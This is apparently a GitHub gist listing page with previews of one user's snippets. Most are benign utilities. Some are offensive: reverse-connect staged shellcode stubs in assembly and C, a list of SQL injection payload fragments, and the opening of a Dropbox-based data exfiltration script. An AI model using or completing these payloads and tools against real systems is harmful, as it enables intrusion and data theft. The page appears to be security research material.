Skip to content

Instantly share code, notes, and snippets.

View JohnTroony's full-sized avatar
🐙
multitasking

Octo Leap JohnTroony

🐙
multitasking
View GitHub Profile
@JohnTroony
JohnTroony / OpSec
Created April 28, 2017 09:21
Guide for proper Opsec and comsec for the paranoid.
# OPS Info
## Info:
* Google Custom Alerts: http://google.com/alerts/
* Google Reverse Image search instructions: https://support.google.com/websearch/answer/1325808?hl=en
## Antitheft Apps :
* Lookout: https://www.lookout.com/
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This script will delete all of the tweets in the specified account.
You may need to hit the "more" button on the bottom of your twitter profile
page every now and then as the script runs, this is due to a bug in twitter.
You will need to get a consumer key and consumer secret token to use this
script, you can do so by registering a twitter application at https://dev.twitter.com/apps
# Generated by https://www.countryipblocks.net/acl.php
# Enable and Set Up the .htaccess File on Apache -
# https://www.linode.com/docs/guides/how-to-set-up-htaccess-on-apache/
allow from 5.10.100.136/29
allow from 5.153.49.176/29
allow from 37.58.111.112/29
allow from 37.58.127.208/29
allow from 41.57.96.0/20
allow from 41.72.160.0/19
allow from 41.75.144.0/20
@JohnTroony
JohnTroony / reverse_stager_shellcode.asm
Last active April 29, 2023 12:06
x86 Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.
; John (Troon) Ombagi
; Twitter/Github : @johntroony
global _start
section .text
_start:
; Create new stack frame
@JohnTroony
JohnTroony / reverse_staged_shellcode.c
Created November 25, 2019 17:59
Windows Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.
#include<stdio.h>
#include<winsock2.h>
//Winsock Library
#pragma comment(lib,"ws2_32.lib")
// John (Troon) Ombagi
// Twitter/Github : @johntroony
int main(int argc, char **argv){
@JohnTroony
JohnTroony / Troony_SQLi_Payloads.txt
Created November 8, 2021 06:21
A collection of SQLi payloads I've created for SQL injection hunting.
--+
--%20
--
-- -
/*
#
%23
;%00
')--+
') AND 1 --+
@JohnTroony
JohnTroony / bloom.py
Created August 4, 2017 16:57 — forked from marcan/bloom.py
Simple Bloom filter implementation in Python 3 (for use with the HIBP password list)
#!/usr/bin/python3
#
# Simple Bloom filter implementation in Python 3
# Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
# Licensed under the terms of the MIT license
#
# Written to be used with the Have I been pwned? password list:
# https://haveibeenpwned.com/passwords
#
# Download the pre-computed filter here (629MB, k=11, false positive p=0.0005):
@JohnTroony
JohnTroony / fix_gef_on_gdb.sh
Created June 7, 2020 20:04
Install GEF-GDB Plugin with all commands working.
#!/bin/bash
#######################################################
# Install GEF-GDB Plugin with all commands working #
# John (Troon) Ombagi : @johntroony #
#######################################################
# Install unicorn, capstone (dependency package)
sudo apt update && sudo apt install -y build-essential python3 python3-dev python3-pip gdb libcapstone3 libcapstone-dev cmake
@JohnTroony
JohnTroony / main.yaml
Created April 15, 2018 18:32 — forked from kbariotis/main.yaml
Ansible playbook for deploying a Node.js app to DigitalOcean
- name: DO
hosts: localhost
vars:
project_name: "PUT A NAME FOR YOUR PROJECT HERE"
do_token: "PUT YOUR DIGITAL OCEAN API KEY HERE ==> https://cloud.digitalocean.com/settings/api/tokens"
repository: "PUT YOUR REPOSITORY URL HERE"
tasks:
- name: LOCAL | Generate SSH key
shell: ssh-keygen -b 2048 -t rsa -f ~/.ssh/{{project_name}} -q -N ""
@JohnTroony
JohnTroony / DropBoxLoot.py
Created October 3, 2017 17:58
Python Script Post Exploitation Activities (Data Exfiltration where network bandwidth is limited but Dropbox is allowed).
# -*- coding: utf-8 -*-
"""
@author: John Ombagi
"""
import os
import sys
import base64
import dropbox
import time